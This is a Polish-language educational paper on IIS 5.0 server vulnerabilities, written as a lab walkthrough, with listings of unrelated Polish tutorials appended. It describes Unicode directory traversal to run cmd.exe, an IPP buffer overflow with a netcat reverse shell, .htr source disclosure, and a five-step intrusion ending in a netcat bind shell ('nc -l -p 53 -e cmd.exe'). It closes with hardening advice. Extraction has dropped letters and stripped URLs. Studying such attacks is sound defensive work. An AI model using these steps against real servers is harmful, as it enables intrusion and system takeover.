IIS 5.0 błdy i luki w serwerze WWW
|
|
- Dagmara Pawłowska
- 8 lat temu
- Przeglądów:
Transkrypt
1 IIS 5.0 błdy i luki w serwerze WWW
2 W pracy omówione zostan sposoby jakimi moe posłuy si intruz zamierzajcy włama si do serwera IIS, by zmieni zawarto umieszczonych na nim stron lub całkowicie przej kontrol na systemem. Pokazane zostan take metody zabezpieczenia serwera przed atakiem. Pakiet oprogramowania Internet Information Services (IIS) jest dołczony do systemu operacyjnego Windows. Jego podstawowym zadaniem jest pełnienie funkcji serwera WWW, ponadto oferuje równie moliwo uruchomienia serwerów FTP, SMTP, NNTP oraz proxy. IIS jest popularnym serwerem midzy innymi ze wzgldu na prostot konfiguracji. Po zainstalowaniu składników serwera nie trzeba wiele wysiłku, eby uruchomi serwis WWW. Z punktu widzenia uytkowników niezajmujcych si systemami komputerowymi ani bezpieczestwem, jest to dua zaleta. Jest to jednak równie dua zaleta dla intruzów. Wikszo uytkowników poprzestaje na podstawowej instalacji IIS, nie starajc si dodatkowo zabezpieczy serwera. Zwykle wic serwer IIS działa z domyln konfiguracj, co sprawia e jest on czstym celem ataków. W eksperymentach korzysta bd z dwóch wirtualnych maszyn. Na jednej z nich zainstalowany jest system operacyjny Windows 2000 Professional oraz pakiet IIS 5.0 z domylnymi ustawieniami (IP: ) komputer bdcy ofiar ataków. Druga maszyna działa pod systemem Mandrake Linux 10.1 (IP: ) komputer intruza. JAK ROZPOZNA SERWER IIS Aby rozpocz atak na serwer IIS intruz musi si najpierw upewni, e jego celem jest rzeczywicie serwer IIS. Jednym ze sposobów w jaki moe to zrobi jest tzw. badanie banerów. Proces pobierania strony z serwera polega na wysyłaniu da (od klienta do serwera) i otrzymaniu odpowiedzi (od serwera do klienta). W skład odpowiedzi serwera wchodzi zawarto strony oraz nagłówki HTTP. Domylnie skonfigurowany serwer IIS bez wahania ujawnia swoj tosamo, wysyłajc nastpujcy nagłówek: Server: Microsoft-IIS/5.0
3 Technik t mona zastosowa poprzez połczenie si z portem 80 serwera i wysłanie odpowiedniego cigu znaków jako danie, a nastpnie odczytanie nagłówków otrzymanej odpowiedzi. Do nawizania połczenia TCP z okrelonym portem danego serwera mona posłuy si narzdziem netcat. [ Po zainicjowaniu połczenia poleceniem nc wpisujemy danie: GET / HTTP/1.0, a nastpnie pusty wiersz. W odpowiedzi od serwera widzimy zapis: Server: Microsoft-IIS/5.0. Oznacza to, e na komputerze jest uruchomiony IIS w wersji 5.0. Przykład zastosowania tej metody został pokazany na rysunku poniej. Chcc zabezpieczy serwer przed identyfikacj poprzez badanie banera, powinnimy zmieni tre odpowiedzi banera. Nie jest to proste, poniewa w serwerze IIS 5.0 tre banera jest na stałe zapisana w kodzie programu. Mona jednak skorzysta z narzdzia UrlScan. W pliku konfiguracyjnym urlscan.ini zmieniamy wpis RemoveServerHeader=0 na RemoveServerHeader=1 Po wprowadzeniu tej zmiany z nagłówków odpowiedzi znika informacja o typie serwera. Wicej o UrlScan na stronie: [
4 Po sprawdzeniu, e mamy do czynienia z serwerem IIS, rozpoczynamy testowanie, na jakie metody ataku jest on podatny. PRZEGLDANIE SYSTEMU PLIKÓW Ataki zwane przegldanie systemu plików (ang. filesystem traversal) umoliwiaj odczytywanie plików znajdujcych si na serwerze, a niekiedy nawet zdalne wykonywanie polece. Idea jest prosta korzystajc z tradycyjnej sztuczki../ moemy uzyska dostp do dowolnego pliku na serwerze, a nawet wykonywa polecenia (uruchamiajc cmd.exe). Symbol../ uywany jest w URL-u w podobny sposób jak podczas zmiany biecego katalogu w wierszu polece. Przykład: Jeli jestemy w katalogu c:\temp\katalog, to po wywołaniu polecenia cd.. znajdziemy si stopie wyej, czyli w katalogu c:\temp. W przypadku URL sytuacja wyglda analogicznie. Umieszczajc../ w daniu wysłanym do serwera, intruz bdzie mógł porusza si po drzewie katalogów serwera. Gdybymy wysłali nastpujce danie: w odpowiedzi otrzymalibymy plik \dokumenty\2004\info.html z głównego katalogu serwera WWW. Jeli głównym katalogiem jest c:\inetpub, otrzymalibymy plik c:\inetpub\dokumenty\2004\info.html. Jeli natomiast wysłalibymy danie: otrzymalibymy plik c:\inetpub\dokumenty\2003\info.html. Umieszczajc symbol dwóch kropek spowodowalimy zmian katalogu z 2004 na katalog nadrzdny dokumenty, nastpnie dostalimy si do katalogu 2003, skd zadalimy pliku info.html. W obu przypadkach nie przekroczylimy naszych praw. Odczytalimy plik znajdujcy si w c:\inetpub. Co jednak stałoby si gdybymy chcieli odczyta plik: W tej sytuacji dwie kropki przenosz z katalogu c:\inetpub do katalogu nadrzdnego c:\, w którym znajduje si plik plik.txt. Jeli faktycznie udałoby si nam odczyta ten plik,
5 oznaczałoby to, e uzyskalimy dostp do informacji nie udostpnionych dla uytkowników serwera WWW. Ponadto, gdybymy tylko znali struktur katalogów serwera, moglibymy dosta si do kadego pliku. Przyjrzyjmy si kilku przykładom. Przegldanie systemu plików za pomoc Unicode Zasadniczo IIS 5.0 nie jest podatny na sztuczki z wykorzystaniem symbolu../ - przed wysłaniem pliku klientowi serwer sprawdza, czy w ciece dostpu nie wystpuje cig../ mogcy spowodowa wyjcie z głównego katalogu. Interesujca sytuacja ma miejsce, gdy w ciece wystpuj znaki Unicode. W takim przypadku IIS najwyraniej sprawdza ciek przed dekodowaniem tych znaków. Oznacza to, e po odebraniu dania: IIS w pierwszej kolejnoci sprawdza, czy danie nie zawiera podejrzanego symbolu../. Nastpnie dekoduje znaki Unicode. Cig %c0%af odpowiada znakowi / w Unicode, tak wic danie przetwarzane jest do nastpujcej postaci: co oznacza, e IIS dostarczy nam plik c:\plik.txt. Wykorzystujc t luk jestemy w stanie uzyska dostp do dowolnego pliku na serwerze, pod warunkiem, e znamy ciek dostpu do niego. Dostp uzyskamy z uprawnieniami konta IUSR_NAZWAKOMPUTERA, gdzie NAZWAKOMPUTERA jest netbiosow nazw serwera. To konto jest wykorzystywane do anonimowego dostpu z sieci do serwera WWW. Standardowo naley ono do grupy Gocie (Local Guests) na serwerze. Uprawnienia tego konta przyznawane s anonimowym uytkownikom serwera WWW. Poza kontem IUSR_NAZWAKOMPUTERA, mamy jeszcze konto SYSTEM (LocalSystem). Jest ono wykorzystywane przez system operacyjny do uruchamiania programów i sterowników. Nie jest kontem uytkownika. Konto to ma nieograniczony dostp do systemu operacyjnego. Jeli intruzowi udałoby si przej kontrol nad tym kontem, mógłby zrobi z systemem praktycznie wszystko. Załómy e znamy lokalizacj pliku, do którego chcemy uzyska dostp. Aby wysła danie moemy skorzysta z przegldarki lub wysła danie HTTP bezporednio, za pomoc programu netcat. W pierwszym przypadku wpisujemy je w polu adresu przegldarki, w drugim natomiast postpujemy podobnie jak przy badaniu banerów, tj. wpisujc:
6 nc GET /..%c0%afplik.txt Jeli plik, którego dotyczy danie, jest plikiem wykonywalnym, uzyskujemy dodatkowe moliwoci. Jeli znajduj si on w katalogu wirtualnym, w którym uytkownik IUSR_NAZWAKOMUTERA ma prawo wykonywania (na przykład /scripts), wówczas zostanie wykonany, a wynik zostanie zwrócony przez serwer. Moemy ponadto oszuka serwer, by uznał, e plik znajduje si w katalogu z prawem wykonywania nawet, jeli faktycznie jest inaczej. Wykorzystujc ponownie sztuczk z dwiema kropkami wchodzimy do katalogu /scripts, po czym wychodzimy do katalogu nadrzdnego i podajemy ciek dostpu do pliku w innym katalogu. Przykład: Serwer IIS bdzie sdził, e plik znajduje si w katalogu scripts cieka jest analizowana zanim cig..%c0%af.. zostanie zdekodowany do postaci../... Serwer nie wie zatem, e po wejciu do katalogu scripts przechodzimy dwa poziomy wyej i próbujemy uzyska dostp do /winnt/system32/cmd.exe. Warto wiedzie, e do wywoływanego pliku moemy przekazywa argumenty, posługujc si znakiem?. Przykład: Chcc wypisa zawarto katalogu c:\ wysyłamy nastpujce danie: dir+c:\ danie moemy wysła za pomoc przegldarki lub programu netcat
7 Luka przegldania systemu plików została poprawiona w Windows 2000 Service Pack 3. ATAKI PRZEZ PRZEPEŁNIENIE BUFORA Atak przez przepełnienie bufora, w skrócie, polega na przekazaniu programowi zbyt duej iloci danych, powodujc wykonanie przygotowanego przez intruza kodu, który w normalnych okolicznociach nie miałby prawa zosta wykonany. Dodatkowy kod trafia do innego obszaru pamici i wskutek błdu w programie, który niewłaciwie sprawdza rozmiar danych wejciowych, zostaje wykonany z uprawnieniami takimi samymi, jak wadliwy program. Poniewa IIS działa na koncie SYSTEM, które w Windows ma nieograniczon władz, przepełnienie bufora naley uwaa za najbardziej niebezpieczny rodzaj ataku, na jaki naraony jest serwer IIS. Przepełnienie bufora IPP Luka ta wystpuje w filtrze ISAPI.printer, którego zadaniem jest obsługa protokołu Internet Printing Protocol (IPP). Sama technologia ISAPI (Internet Services Application Programming Interface) umoliwia rozszerzanie funkcjonalnoci serwera WWW poprzez dołczanie do niego kodu implementujcego dodatkowe usługi.
8 Filtr ISAPI.printer jest domylnie instalowany na serwerze. Błd mona wykorzysta wysyłajc cig około 420 bajtów w nagłówku wysłanym w daniu ISAPI.printer. Po otrzymaniu takiego dania w IIS dochodzi do przepełnienia bufora i serwer przestaje działa. Jednak Windows 2000 automatycznie uruchamia IIS ponownie zaraz po awarii, co ma na celu zapewnienie jak najwikszej niezawodnoci usług sieciowych. W efekcie kod umieszczony w buforze zostaje wykonany. Luk wykorzystuje exploit zwany jill [ którego autorem jest dark spirit z beavuh.org. Exploit powoduje przepełnienie bufora w serwerze IIS i uruchamia na zdalnej maszynie powłok, do której dostp moe uzyska intruz łczc si z portem o wybranym numerze. Intruz rozpoczyna od nasłuchiwania na wybranym porcie TCP (np. 2006), za pomoc takiego narzdzia jak netcat: nc vv l p 2006 W drugim oknie polece intruz uruchamia exploita, podajc mu jako parametry: IP ofiary, IP maszyny nasłuchujcej oraz numer portu, na którym ma zosta udostpniona powłoka. Intruz jeszcze tylko musi wcisn [Enter] w okienku nasłuchiwania by połczy si z powłok. Nastpnie moe wywoływa dowolne polecenia z uprawnieniami konta SYSTEM.
9 Błd został naprawiony w Windows 2000 SP3. UJAWNIANIE KODU RÓDŁOWEGO Gdy klient wysyła do serwera danie otworzenia strony HTML, serwer bezporednio odsyła mu jej zawarto. Kiedy danie dotyczy strony zrealizowanej w ASP lub PHP, wówczas w pierwszej kolejnoci serwer wykonuje kod zawarty w skrypcie, a potem wysyła wyniki klientowi. W ten sposób klient nie ma dostpu do kodu ródłowego strony (skryptu), któr oglda. Ten fakt jest niekiedy wykorzystywany przez programistów, którzy umieszczaj w kodzie stron poufne informacje, jak choby nazwy uytkowników i hasła. Przykładowo, logowanie uytkownika moe wyglda nastpujco: if ( $username== admin ) && ($passwd== secret77 ) ) { $logged_in=1; }
10 W normalnych okolicznociach takie rozwizanie nie jest niebezpieczne, poniewa uytkownik nie moe zobaczy treci kodu ródłowego. Jeli jednak znalazłby luk w serwerze IIS umoliwiajc podgld kodu stron, wówczas hasło zostałoby ujawnione. Luka +.htr HTR jest jedn z pierwszych zaawansowanych technik skryptowych, jakie weszły w skład serwera IIS 2.0. Obecnie najczciej spotykanym zastosowaniem mechanizmu HTR jest zestaw skryptów dołczonych standardowo do serwera IIS. Ich zadaniem jest umoliwienie dostpu do haseł Windows NT przez serwer WWW. Uytkownicy mog za pomoc tych skryptów zmienia swoje hasła, natomiast administratorzy mog wykorzystywa je w zarzdzaniu hasłami. Gdy klient wysyła danie pliku.htr jest ono przekazywane do biblioteki ISM.DLL, która wskutek błdu zwraca zawarto pliku. W ten sposób intruz moe odczyta tre pliku.htr. Ten sam błd moe by wykorzystany do odczytania zawartoci pliku.asp. Wybieramy ciek dostpu do dowolnego pliku.asp: i dodajemy do niej +.htr: Gdy serwer IIS analizuje otrzymane danie, zwraca uwag na kocowy cig znaków.htr, wic postpuje tak samo jak w przypadku dowolnego pliku.htr przekazuje danie do biblioteki ISM.DLL. ISM.DLL usuwa ze cieki przyrostek +.htr i pokazuje zawarto pliku /global.asa. W podobny sposób mona postpi z plikami.asp i.ini. Jednak odczytana zostanie tre ródła pliku tylko do pierwszego wystpienia cigu <% - znaczniki <% i %> s ogranicznikami skryptów wykonywanych po stronie serwera. Chcc odczyta plik global.asa, intruz musi jedynie uruchomi program netcat i wpisa danie GET /global.asa+.htr. Oczywicie moe równie skorzysta z przegldarki i wpisa nastpujcy adres:
11 Dostp do poufnych informacji (na przykład nazwy uytkownika i hasła) moe znaczco ułatwi intruzowi włamanie do systemu. Najskuteczniejsz ochron przed ujawnieniem ukrytych informacji jest przestrzeganie zasad bezpiecznego programowania w kodzie ASP. Luka została naprawiona w Windows 2000 SP3. ZWIKSZANIE UPRAWNIE Intruz, który zdołał wedrze si do systemu i uruchomi powłok z uprawnieniami konta SYSTEM ma prawie nieograniczone moliwoci. Jednak nawet, gdy intruz dysponuje jedynie uprawnieniami konta anonimowego lub nieuprzywilejowanego, moe dokona zniszcze w systemie lub nawet przej uprawnienia konta SYSTEM. Jak kopiowa pliki na system ofiary Gdy jestemy zalogowani lokalnie do komputera z systemem Windows, moemy łatwo przekierowywa wyniki wykonywanego polecenia stosujc symbol >. Przykładowo, jeli wydamy nastpujce polecenie: dir c:\ > dirc.txt wyniki polecenia trafi do pliku dirc.txt. Metody tej nie mona jednak stosowa w przypadku polece wykonywanych za porednictwem cmd.exe ze wzgldu na ograniczenia przekierowa w serwerze IIS, chyba, e zmienimy nazw cmd.exe. Dlatego te pierwsz rzecz, jak robi intruz, jest skopiowanie
12 pliku cmd.exe do katalogu /scripts (podstawowe ustawienia bezpieczestwa Windows 2000 daj uytkownikowi nalecemu do grupy Wszyscy (Everyone) pełn kontrol nad tym katalogiem). Intruz wpisuje w przegldarce nastpujcy adres: +copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmdx.exe Kopia cmd.exe została umieszczona w katalogu /scripts, zatem intruz nie bdzie musiał wykonywa adnych sztuczek z przechodzeniem do innego katalogu, by uzyska do niej dostp. Łatwiej bdzie mu wydawa polecenia w systemie ofiary.
13 Jak tworzy pliki w systemie ofiary Wydajc polecenie w rodzaju echo > plik, intruz ma moliwo tworzenia nowych plików w zdalnym systemie za pomoc przegldarki, w której wpisuje adres: owy.txt Spowoduje to utworzenie pliku nowy.txt w katalogu /scripts. ATAK NA SERWER IIS ANALIZA KROK PO KROKU Przeanalizujmy teraz szczegółowy opis ataku na serwer IIS. Zobaczymy, jak serwer IIS ze standardowymi zabezpieczeniami, bez jakichkolwiek uaktualnie czy łat, pada ofiar intruza, który w piciu krokach zdobywa w systemie uprawnienia konta SYSTEM. Krok 1 poszukiwanie luk Najpierw intruz sprawdza, czy system jest podatny na atak Unicode.
14 katalogu c:\. Wyglda na to, e system jest podatny, poniewa udało si odczyta list plików w Krok 2 przygotowanie do umieszczenia plików na serwerze Chcc kontynuowa atak, intruz musi umieci na serwerze kilka plików. Mona tu skorzysta ze skryptu perla unicodeloader [ narzdzia, które umoliwia przesyłanie plików za porednictwem wygodnego interfejsu. Skrypt unicodeloader umieszcza na serwerze plik pomocniczy, który intruz otwiera (wpisujc okrelony adres), otrzymujc stron z formularzem słucym do przesyłania plików z komputera lokalnego na serwer. Wywoływany jest nastpujco: unicodeloader IP:port katalogwww Jako katalogwww podajemy nazw katalogu, w którym uytkownik IUSR_NAZWAKOMPUTERA moe wykonywa pliki. Jak zdylimy si przekona, warunek ten spełnia katalog c:\inetpub\scripts.
15 Intruz moe od tej pory przesyła pliki na serwer korzystajc ze strony upload.asp. Krok 3 umieszczenie plików na serwerze Po wpisaniu w przegldarce adresu intruz bdzie mógł za pomoc kilku klikni umieszcza pliki w katalogu wirtualnym /scripts. W kolejnym kroku intruz umieszcza na serwerze pliki niezbdne do przeprowadzenia dalszej czci ataku. Bdzie mu potrzebny plik, który umoliwi przejcie uprawnie konta
16 SYSTEM. W tym celu wykorzystana zostanie luka znana jako RevertToSelf w bibliotece DLL ISAPI. Luka wystpuje w mechanizmie InProcessIsapiApps, umoliwiajcym omijanie zabezpiecze aplikacji przy uyciu wywoła RevertToSelf w DLL ISAPI. W uproszczeniu, wywołanie RevertToSelf spowoduje, e biecy wtek zmieni swój kontekst bezpieczestwa z uprawnie IUSR_NAZWAKOMPUTERA na uprawnienia konta, z którego prawami działa IIS (inetinfo.exe) czyli SYSTEM. HD Moore z digitaloffence.net udostpnia plik iiscrack.dll [ który wykorzystuje omówion luk i umoliwia wykonywanie dowolnych polece z uprawnieniami konta SYSTEM. By zastosowa exploit naley zmieni nazw tego pliku na nazw okrelon w kluczu Metabazy IIS/LM/W3SVC/InProcessIsapiApps. Intruz musi zatem jedynie otworzy stron upload.asp i umieci na serwerze plik o nazwie zmienionej na httpodbc.dll. Wspomniany błd został naprawiony w Windows 2000 SP3. Nastpnym punktem planu intruza jest przygotowanie tylnej furtki w systemie ofiary. Intruz moe zastosowa program netcat (wersja dla Windows) [ który moe umieci na serwerze korzystajc ze strony upload.asp. Krok 4 uruchomienie tylnej furtki z uprawnieniami konta SYSTEM Aby wywoła httpodbc.dll w katalogu wirtualnym /scripts, intruz po prostu wpisuje w przegldarce adres: Uzyskuje w ten sposób dostp do strony, na której znajduje si pole tekstowe umoliwiajce wydawanie polece. Wpisane polecenie zostanie wykonane z uprawnieniami konta SYSTEM. Podczas testowania, okazało si, e nie do koca działa to poprawnie. Przy wydaniu polecenia: c:\winnt\system32\cmd.exe /c
17 pojawiał si nastpujcy błd Wystarczyło jednak w adresie cmd=c%3a%5cwinnt%5csystem32%5ccmd.exe+%2fc&submitter=execute skasowa ostatni człon:
18 &submitter=execute co sprawiło, e exploit zadziałał. Intruz wydaje wic nastpujce polecenie: c:\inetpub\scripts\nc l p 53 e cmd.exe I tak jak wczeniej kasuje ostatni człon w adresie, tj.
19 &submitter=execute W efekcie zobaczy on stron z potwierdzeniem poprawnego wykonania polecenia. Uruchamia ono powłok dostpn przez port TCP o numerze 53. Wybór numeru portu ma znacznie, poniewa gdyby atakowany serwer znajdował si za firewallem, istnieje spora szansa na to, e bdzie on akceptował połczenia AXFR DNS (port TCP 53). Krok 5 ostateczny cios Intruzowi pozostaje jedynie połczy si z powłok, któr uruchomił. Moe w tym celu wykorzysta program netcat.
20 JAK POPRAWI BEZPIECZESTWO Oto kilka metod postpowania słucych poprawie poziomu bezpieczestwa serwera IIS, których stosowanie znacznie ograniczy ryzyko włamania. 1. Na wstpie kilka wanych wskazówek odnonie instalacji: o przygotujmy oddzieln partycj lub oddzielny dysk dla zawartoci stron WWW udaremni to wikszo z omówionych ataków. Narzdzia słuce do włamywania si na serwery IIS zakładaj zwykle, e strony WWW s przechowywane w standardowych katalogach. o partycja systemowa oraz partycja zawierajca strony WWW powinny by partycjami NTFS. Pozwala to w wikszym stopniu kontrolowa ustawienia bezpieczestwa, korzystajc z list kontroli dostpu (ang. Access Control List - ACL). o instalujmy najnowsze pakiety uaktualnie i łaty. 2. Usumy z serwera przykładowe aplikacje i katalogi. Przykłady nie s do niczego potrzebne na pracujcym serwerze. Postpujmy według zasady: jeli co nie jest nam potrzebne, usumy to.
21 3. Wyłczmy wszystkie zbdne usługi, szczególnie serwer telnetu, jeli z niego nie korzystamy. 4. Powinnimy ponadto rozway podział plików udostpnianych na stronach pomidzy odrbne katalogi. 5. IIS jest wstpnie skonfigurowany tak, by obsługiwa podstawowe typy plików, takie jak.asp i.shtm. Gdy serwer odbiera danie dotyczce jednego z takich plików, jest ono obsługiwane przez bibliotek DLL. Jeli obsługa niektórych plików nie jest nam potrzebna, usumy ich mapowania, postpujc zgodnie z ponisz instrukcj: o otwieramy Menadera usług internetowych (Internet services manager), o klikamy prawym przyciskiem na nazw serwera, wybieramy z menu Właciwoci (Properties), o właciwoci główne (Master Properties), o wybieramy Usługa WWW->Edytuj->Katalog macierzysty->konfiguracja (WWW Service->Edit->HomeDirectory->Configuration). Bibliografia: - Magazyn Hakin9 nr 4/ Wykrywanie, analiza i przeciwdziałanie atakom hackerów w Checz Point Firewall-1 NG [ - strony www wymienione w pracy
Poradnik korzystania z serwisu UNET: Dostp do poczty elektronicznej ze strony WWW
Poradnik korzystania z serwisu UNET: Dostp do poczty elektronicznej ze strony WWW W przypadku braku stosownego oprogramowania słucego do komunikacji z systemem pocztowym UNET uytkownik ma moliwo skorzystania
Bardziej szczegółowoProjektowanie bezpiecze stwa sieci
Laboratorium 5. Projektowanie bezpieczestwa sieci Temat: Instalacja i konfiguracja serwera VPN. 1. Przed instalacj odpowiednich ról serwera, na maszynie wirtualnej serwera musimy przygotowa dwie karty
Bardziej szczegółowoWindows W celu dostępu do i konfiguracji firewall idź do Panelu sterowania -> System i zabezpieczenia -> Zapora systemu Windows.
Bezpieczeństwo Systemów Informatycznych Firewall (Zapora systemu) Firewall (zapora systemu) jest ważnym elementem bezpieczeństwa współczesnych systemów komputerowych. Jego główną rolą jest kontrola ruchu
Bardziej szczegółowoMozilla Firefox 2.0.0.2 PL. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Firefox 2.0.0.2 PL. wersja 1.1
Mozilla Firefox 2.0.0.2 PL Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Firefox 2.0.0.2 PL wersja 1.1 Spis treci 1. INSTALACJA CERTYFIKATÓW URZDÓW POREDNICH... 3 2. INSTALACJA
Bardziej szczegółowoPoradnik korzystania z serwisu UNET: Konfiguracja programu pocztowego
Poradnik korzystania z serwisu UNET: Konfiguracja programu pocztowego Niniejszy opis dotyczy konfiguracji programu pocztowego Outlook Express z pakietu Internet Explorer, pracujcego pod kontrol systemu
Bardziej szczegółowoKlonowanie MAC adresu oraz TTL
1. Co to jest MAC adres? Klonowanie MAC adresu oraz TTL Adres MAC (Media Access Control) to unikalny adres (numer seryjny) kadego urzdzenia sieciowego (jak np. karta sieciowa). Kady MAC adres ma długo
Bardziej szczegółowoSpis treci. Dzie 1. I Wprowadzenie (wersja 0911) II Dostp do danych biecych specyfikacja OPC Data Access (wersja 0911)
I Wprowadzenie (wersja 0911) Kurs OPC Integracja i Diagnostyka Spis treci Dzie 1 I-3 O czym bdziemy mówi? I-4 Typowe sytuacje I-5 Klasyczne podejcie do komunikacji z urzdzeniami automatyki I-6 Cechy podejcia
Bardziej szczegółowozdefiniowanie kilku grup dyskusyjnych, z których chcemy odbiera informacje, dodawanie, usuwanie lub edycj wczeniej zdefiniowanych grup dyskusyjnych,
Wstp W nowoczesnym wiecie coraz istotniejsz rol odgrywa informacja i łatwy dostp do niej. Nie dziwi wic fakt, i nowoczesne telefony komórkowe to nie tylko urzdzenia do prowadzenia rozmów telefonicznych,
Bardziej szczegółowoPrzegldanie stron wymaga odpowiedniej mikroprzegldarki w urzdzeniu mobilnym lub stosownego emulatora.
I. Temat wiczenia Podstawy tworzenia stron WAP II. Wymagania Podstawowe wiadomoci z technologii Internetowych. III. wiczenie 1. Wprowadzenie WAP (ang. Wireless Application Protocol) - to protokół umoliwiajcy
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.
T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików
Bardziej szczegółowoobsług dowolnego typu formularzy (np. formularzy ankietowych), pobieranie wzorców formularzy z serwera centralnego,
Wstp GeForms to program przeznaczony na telefony komórkowe (tzw. midlet) z obsług Javy (J2ME) umoliwiajcy wprowadzanie danych według rónorodnych wzorców. Wzory formularzy s pobierane z serwera centralnego
Bardziej szczegółowoOpera 9.10. Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Opera 9.10. wersja 1.1 UNIZETO TECHNOLOGIES SA
Opera 9.10 Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Opera 9.10 wersja 1.1 Spis treci 1. INSTALACJA WŁASNEGO CERTYFIKATU Z PLIKU *.PFX... 3 2. WYKONYWANIE KOPII BEZPIECZESTWA WŁASNEGO
Bardziej szczegółowoTomasz Greszata - Koszalin
T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołów HTTP oraz HTTPS i oprogramowania IIS (ang. Internet Information Services).
Bardziej szczegółowoSystemy operacyjne lab. 6 Paweł Gmys strona 1
Systemy operacyjne lab. 6 Paweł Gmys strona 1 I Uytkownicy i grupy 1. Proces logowania Rozpoczynajc prac z systemem na komputerze lokalnym Windows 2000 musimy poda w oknie logowania identyfikator uytkownika
Bardziej szczegółowoInstrukcja instalacji Control Expert 3.0
Instrukcja instalacji Control Expert 3.0 Program Control Expert 3.0 jest to program służący do zarządzania urządzeniami kontroli dostępu. Dedykowany jest dla kontrolerów GRx02 i GRx06 oraz rozwiązaniom
Bardziej szczegółowoDokonaj instalacji IIS opublikuj stronę internetową z pierwszych zajęć. Ukaże się kreator konfigurowania serwera i klikamy przycisk Dalej-->.
Dokonaj instalacji IIS opublikuj stronę internetową z pierwszych zajęć Ukaże się kreator konfigurowania serwera i klikamy przycisk Dalej-->. Następnie wybieramy Serwer aplikacji (IIS, ASP.NET) i klikamy
Bardziej szczegółowoInstalacja programu Sprzeda z motorem. bazy danych Pervasive V8
Instalacja programu Sprzeda z motorem bazy danych Pervasive V8 1. Z katalogu instalacyjnego programu Pervasive uruchom plik setup.exe. Program instalacyjny w spakowanej wersji jest dostpny na naszym FTP
Bardziej szczegółowo3. Instalator rozpocznie proces instalacji
Uwaga! Podana instrukcja instalacji została przygotowana w oparciu o pliki instalacyjne SQL 2005 Express pobrany ze strony Microsoftu oraz oddzielny plik Service Pack 2 dedykowany pod SQL Express równie
Bardziej szczegółowoMozilla Thunderbird 1.5.0.10 PL
Mozilla Thunderbird 1.5.0.10 PL Wykorzystanie certyfikatów niekwalifikowanych w oprogramowaniu Mozilla Thunderbird 1.5.0.10 PL wersja 1.2 Spis treci 1. INSTALACJA CERTYFIKATÓW URZDÓW POREDNICH... 3 2.
Bardziej szczegółowoInstrukcja instalacji HP Instant Support Enterprise Edition Standard Configuration (ISEE SC) MS Windows (HP Proliant, HP Netserver)
Instrukcja instalacji HP Instant Support Enterprise Edition Standard Configuration (ISEE SC) MS Windows (HP Proliant, HP Netserver) Copyright 2004 Hewlett-Packard Company Wersja 1.6 Wstp Instant Support
Bardziej szczegółowoJarosław Kuchta Administrowanie Systemami Komputerowymi. Internetowe Usługi Informacyjne
Jarosław Kuchta Internetowe Usługi Informacyjne Komponenty IIS HTTP.SYS serwer HTTP zarządzanie połączeniami TCP/IP buforowanie odpowiedzi obsługa QoS (Quality of Service) obsługa plików dziennika IIS
Bardziej szczegółowoInstalacja programu Sprzeda
Instalacja programu Sprzeda 1. Aby zainstalowa program Sprzeda w wersji 2.10, na serwerze lub komputerze, na którym przechowywane bd dane programu, pozamykaj wszystkie działajce programy i uruchom plik
Bardziej szczegółowoInstrukcja obsługi dodatku InsERT GT Smart Documents
Instrukcja obsługi dodatku InsERT GT Smart Documents InsERT, grudzie 2003 http://www.insert.com.pl/office2003 InsERT GT Smart Documents to przygotowany przez firm InsERT specjalny dodatek, umoliwiajcy
Bardziej szczegółowoSystem midzybankowej informacji gospodarczej Dokumenty Zastrzeone MIG DZ ver. 2.0. Aplikacja WWW ver. 2.1 Instrukcja Obsługi
System midzybankowej informacji gospodarczej Dokumenty Zastrzeone MIG DZ ver. 2.0. Aplikacja WWW ver. 2.1 Instrukcja Obsługi 1.Wymagania techniczne 1.1. Wymagania sprztowe - minimalne : komputer PC Intel
Bardziej szczegółowo1. Informacje ogólne.
Polityka prywatności (Pliki Cookies) 1. Informacje ogólne. Lęborskie Centrum Kultury Fregata 1. Operatorem Serwisu www.lck-fregata.pl jest L?borskie Centrum Kultury "Fregata" z siedzib? w L?borku (84-300),
Bardziej szczegółowoWstęp. Skąd pobrać program do obsługi FTP? Logowanie
Wstęp FTP - (ang. File Transfer Protocol - protokół transmisji danych) jest to protokół typu klient-serwer, który umożliwia przesyłanie plików na serwer, oraz z serwera poprzez program klienta FTP. Dzięki
Bardziej szczegółowoInstrukcja instalacji usługi Sygnity Service
Instrukcja instalacji usługi Sygnity EmailService Usługa Sygnity EmailService jest przeznaczona do wysyłania wiadomości pocztą elektroniczną do klientów zarejestrowanych w Systemach Dziedzinowych Sygnity
Bardziej szczegółowoINSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO
INSTRUKCJA KONFIGURACJI KLIENTA POCZTOWEGO UWAGA!!! Wskazówki dotyczą wybranych klientów pocztowych Zespół Systemów Sieciowych Spis treści 1. Konfiguracja klienta pocztowego Outlook Express 3 2. Konfiguracja
Bardziej szczegółowoInstrukcja konfiguracji funkcji skanowania
Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji
Bardziej szczegółowo4. Podstawowa konfiguracja
4. Podstawowa konfiguracja Po pierwszym zalogowaniu się do urządzenia należy zweryfikować poprawność licencji. Można to zrobić na jednym z widżetów panelu kontrolnego. Wstępną konfigurację można podzielić
Bardziej szczegółowoVinCent Administrator
VinCent Administrator Moduł Zarządzania podatnikami Krótka instrukcja obsługi ver. 1.01 Zielona Góra, grudzień 2005 1. Przeznaczenie programu Program VinCent Administrator przeznaczony jest dla administratorów
Bardziej szczegółowoPracownia internetowa w szkole ZASTOSOWANIA
NR ART/SBS/07/01 Pracownia internetowa w szkole ZASTOSOWANIA Artykuły - serwery SBS i ich wykorzystanie Instalacja i Konfiguracja oprogramowania MOL Optiva na szkolnym serwerze (SBS2000) Artykuł opisuje
Bardziej szczegółowoOprogramowanie OpenVPN jest oprogramowaniem darmowym, które można pobrać ze strony:
